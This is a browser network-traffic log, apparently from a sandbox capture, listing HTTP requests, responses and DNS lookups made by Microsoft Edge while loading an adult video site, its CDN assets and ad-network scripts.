https://ei.phncdn.com/videos/202409/18/457934601/original/(m=q8RW1UZbeafTGgaaaa)(mh=KTZ_UxuYC0lUcZI9)0.jpg

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /videos/202409/18/457934601/original/(m=q8RW1UZbeafTGgaaaa)(mh=KTZ_UxuYC0lUcZI9)0.jpg HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:17 GMT
content-type: image/jpeg
content-length: 16178
expires: Thu, 19 Sep 2024 12:03:09 GMT
cache-control: max-age=86400
last-modified: Wed, 18 Sep 2024 12:03:08 GMT
etag: W/"ffbf-6226396d7ccdc"
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16008-1-119167-h-0-0---;16009-10-10195----0-0-0
GET

https://ei.phncdn.com/videos/202409/24/458192991/original/(m=q5POLVZbeafTGgaaaa)(mh=zOJmvAtP5QBVkoex)0.jpg

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /videos/202409/24/458192991/original/(m=q5POLVZbeafTGgaaaa)(mh=zOJmvAtP5QBVkoex)0.jpg HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: image/jpeg
content-length: 16947
expires: Wed, 25 Sep 2024 11:23:38 GMT
cache-control: max-age=86400
last-modified: Tue, 24 Sep 2024 11:23:37 GMT
etag: "e9ed-622dbbc934bb8"
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-119405-h-0-0---;16009-8-10195----0-0-1
GET

https://ei.phncdn.com/videos/202407/18/455321881/original/(m=qJ3NYPZbeafTGgaaaa)(mh=q9mKD8lEXJlCp31X)0.jpg

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /videos/202407/18/455321881/original/(m=qJ3NYPZbeafTGgaaaa)(mh=q9mKD8lEXJlCp31X)0.jpg HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:17 GMT
content-type: image/jpeg
content-length: 19685
expires: Fri, 19 Jul 2024 13:55:51 GMT
cache-control: max-age=86400
last-modified: Thu, 18 Jul 2024 13:55:47 GMT
etag: "1250f-61d85ef8e62e2"
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16007-2-206702-h-0-0---;16009-8-10195----0-0-0
GET

https://ei.phncdn.com/videos/202409/23/458137081/original/(m=qLMQIVZbeafTGgaaaa)(mh=1MFFkcFokTt5Bm5L)0.jpg

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /videos/202409/23/458137081/original/(m=qLMQIVZbeafTGgaaaa)(mh=1MFFkcFokTt5Bm5L)0.jpg HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: image/jpeg
content-length: 19188
expires: Tue, 24 Sep 2024 08:37:26 GMT
cache-control: max-age=86400
last-modified: Mon, 23 Sep 2024 08:37:25 GMT
etag: W/"1131a-622c54c5f3245"
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16008-1-119166-h-0-0---;16009-8-10195----0-0-0
GET

https://ei.phncdn.com/videos/202409/18/457925521/original/(m=q1KK1UZbeafTGgaaaa)(mh=hApFdPuflWlbEfZ0)0.jpg

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /videos/202409/18/457925521/original/(m=q1KK1UZbeafTGgaaaa)(mh=hApFdPuflWlbEfZ0)0.jpg HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: image/jpeg
content-length: 19338
expires: Thu, 19 Sep 2024 08:34:31 GMT
cache-control: max-age=86400
last-modified: Wed, 18 Sep 2024 08:34:29 GMT
etag: "10f16-62260acb223a7"
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16032-2-282344-h-0-0---;16009-8-10195----0-0-0
GET

https://ei.phncdn.com/www-static/css/htmlPauseRoll/pb_block.css?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/css/htmlPauseRoll/pb_block.css?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: text/css
content-length: 897
last-modified: Tue, 16 Apr 2024 19:09:32 GMT
etag: "661eccec-381"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-2-282343-h-0-0---;16009-8-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/quality-selector.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/quality-selector.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 17176
last-modified: Wed, 02 Oct 2024 17:49:02 GMT
etag: "66fd878e-4318"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-282543-h-0-0---;16009-8-10195----0-0-0
GET

https://ss.phncdn.com/jquery/jquery.tokeninput-1.6.0.js

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /jquery/jquery.tokeninput-1.6.0.js HTTP/2.0
host: ss.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 514
last-modified: Thu, 01 Jun 2023 20:32:16 GMT
etag: "64790050-202"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-119404-h-0-0---;16009-8-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/generated/video-show-pc.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/generated/video-show-pc.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 3423
last-modified: Fri, 04 Sep 2015 16:00:12 GMT
etag: "55e9c00c-d5f"
content-encoding: gzip
expires: Tue, 09 Jul 2024 14:31:52 GMT
cache-control: max-age=1720535512
access-control-allow-origin: *
vary: Accept-Encoding
access-control-allow-methods: GET,HEAD,OPTIONS
x-cdn-diag: lon1-16007-2-206702-h-0-0---;16009-8-10195----0-0-0
GET

https://ei.phncdn.com/www-static/js/widgets-rating-bar.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/widgets-rating-bar.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 2063
last-modified: Wed, 02 Oct 2024 17:49:02 GMT
etag: "66fd878e-80f"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-282544-h-0-0---;16009-8-10195----0-0-0
GET

https://ei.phncdn.com/www-static/js/widgets-rating-like-fav.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/widgets-rating-like-fav.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 4103
last-modified: Mon, 10 Jun 2024 19:27:40 GMT
etag: "666753ac-1007"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-282544-h-0-0---;16009-8-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/widgets-comments.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/widgets-comments.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 499
last-modified: Mon, 26 Aug 2024 15:56:22 GMT
etag: "66cca5a6-1f3"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-2-119229-h-0-0---;16009-8-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/widgets-pornstar.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/widgets-pornstar.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 624
last-modified: Thu, 01 Jun 2023 20:32:16 GMT
etag: "64790050-270"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-2-206703-h-0-0---;16009-8-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/htmlPauseRoll/pb_block.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/htmlPauseRoll/pb_block.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 1302
last-modified: Mon, 08 Jul 2024 20:03:10 GMT
etag: "668c45fe-516"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-1-119166-h-0-0---;16009-8-10195----0-0-1
GET

https://ei.phncdn.com/www-static/js/suggest-translation.js?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/suggest-translation.js?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: application/javascript
content-length: 756
last-modified: Thu, 11 Jan 2024 20:49:34 GMT
etag: "65a0545e-2f4"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:55 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-119405-h-0-0---;16009-8-10195----0-0-2
DNS

41.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.114.254.66.in-addr.arpa

IN PTR

Response

41.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

19.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.156.210.64.in-addr.arpa

IN PTR

Response
DNS

21.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.156.210.64.in-addr.arpa

IN PTR

Response
DNS

media.trafficjunky.net

msedge.exe

Remote address:

8.8.8.8:53

Request

media.trafficjunky.net

IN A

Response

media.trafficjunky.net

IN CNAME

media.trafficjunky.net.sds.rncdn7.com

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.16

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.17

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.21

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.18

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.23

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.19

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.20

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.22
DNS

prvc.io

msedge.exe

Remote address:

8.8.8.8:53

Request

prvc.io

IN A

Response

prvc.io

IN A

104.21.56.52

prvc.io

IN A

172.67.177.254
DNS

cdn1-smallimg.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cdn1-smallimg.phncdn.com

IN A

Response

cdn1-smallimg.phncdn.com

IN CNAME

smallimg.phncdn.com

smallimg.phncdn.com

IN A

66.254.114.156
GET

https://cdn1-smallimg.phncdn.com/n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif

msedge.exe

Remote address:

66.254.114.156:443

Request

GET /n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif HTTP/2.0
host: cdn1-smallimg.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:01 GMT
content-type: image/gif
content-length: 1882
last-modified: Thu, 08 Oct 2015 21:35:30 GMT
etag: "5616e1a2-75a"
expires: Mon, 04 Nov 2024 16:04:01 GMT
cache-control: max-age=2592000
accept-ranges: bytes
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
GET

https://media.trafficjunky.net/delivery/js/abp/js1.js

msedge.exe

Remote address:

64.210.156.16:443

Request

GET /delivery/js/abp/js1.js HTTP/2.0
host: media.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:01 GMT
content-type: application/javascript
content-length: 13
last-modified: Tue, 08 Dec 2015 21:50:49 GMT
etag: "131e477ac-d-52669f77ae040"
expires: Sun, 21 Jul 2024 04:19:34 GMT
cache-control: max-age=1721535574
vary: Accept-Encoding
accept-ranges: bytes
x-cdn-diag: lon1-16007-2-206702-h-0-0---;16007-137-477085----0-0-1
GET

https://prvc.io/api/init-4039n5u7thbwcvx8fran.js

msedge.exe

Remote address:

104.21.56.52:443

Request

GET /api/init-4039n5u7thbwcvx8fran.js HTTP/2.0
host: prvc.io
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:01 GMT
content-type: text/javascript
cache-control: max-age=600
content-encoding: gzip
cf-cache-status: HIT
age: 269
last-modified: Sat, 05 Oct 2024 15:59:32 GMT
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XHn%2FLsTSeWuaT%2BEs5rQo6PAkLZ1MFO6Q557xp330V8nlqRJ%2BeaGKqDqP%2BXZAOfCkBKvV3Nh8YNGcNwA5BagbESUeCA20XLk2ZhsXE3uzP4s9usGpkJ%2BJaNna"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cdea5228e80a00a-AMS
GET

https://ei.phncdn.com/www-static/fonts/ph-icons/ph-icons.woff2?cache=2024100303

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/fonts/ph-icons/ph-icons.woff2?cache=2024100303 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.pornhub.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://ei.phncdn.com/www-static/css/generated-header.css?cache=2024100303
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:04:01 GMT
content-type: application/octet-stream
content-length: 30494
last-modified: Tue, 20 Aug 2024 19:14:27 GMT
etag: "66c4eb13-771e"
content-encoding: br
expires: Fri, 31 Jan 2025 16:36:51 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
timing-allow-origin: *
x-cdn-diag: lon1-16032-2-282343-h-0-0---;16008-69-390825----0-0-1
DNS

ss.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ss.phncdn.com

IN A

Response

ss.phncdn.com

IN CNAME

ss.phncdn.com.sds.rncdn7.com

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.18

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.20

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.21

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.16

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.17

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.23

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.22

ss.phncdn.com.sds.rncdn7.com

IN A

64.210.156.19
DNS

a.adtng.com

msedge.exe

Remote address:

8.8.8.8:53

Request

a.adtng.com

IN A

Response

a.adtng.com

IN A

66.254.114.171
GET

https://a.adtng.com/get/10000098?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-1&tj_zid=5&tj_cid=1007935961&tj_aid=2071998101&infos=CiQxNDczZDhiNC0xMWE4LTRjY2ItOGQ1YS1kMzVkMzc0NThmMGEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTEgAjAFOAVAtZEXSNnDz+ADUgEyWNXrqd4DYIe7tYMEgQHxaOOItfjkPpIBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCld2A3AfgAunQsp8E+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1

msedge.exe

Remote address:

66.254.114.171:443

Request

GET /get/10000098?&uuid=2397afdf1fbe4bacb44e08e0f9d1e5da&impid=2397afdf1fbe4bacb44e08e0f9d1e5da-1&tj_zid=5&tj_cid=1007935961&tj_aid=2071998101&infos=CiQxNDczZDhiNC0xMWE4LTRjY2ItOGQ1YS1kMzVkMzc0NThmMGEQ8MaFuAYaIjIzOTdhZmRmMWZiZTRiYWNiNDRlMDhlMGY5ZDFlNWRhLTEgAjAFOAVAtZEXSNnDz+ADUgEyWNXrqd4DYIe7tYMEgQHxaOOItfjkPpIBAk5MygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w+gEMMTkyLjQyLjExNi4wggIHZGVkNzUyMYgCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCld2A3AfgAunQsp8E+gIBMYIDX3siYWN0b3JfaWQiOm51bGwsImNvbnRlbnRfdHlwZSI6bnVsbCwidmlkZW9faWQiOm51bGwsImhhc2giOiJlYjRkMmFjMGY0YTAyYmI5Njc5YmJlYmFkNzVmNjU4MiJ9kgMHZGVza3RvcJoDAmVuqAMBwgMEaG9tZZIEEEF5bG8gUHJlbWl1bSBMdGSYBAGgBAGoBAGyBAIDAdgENw==&noc=1&not=1 HTTP/2.0
host: a.adtng.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
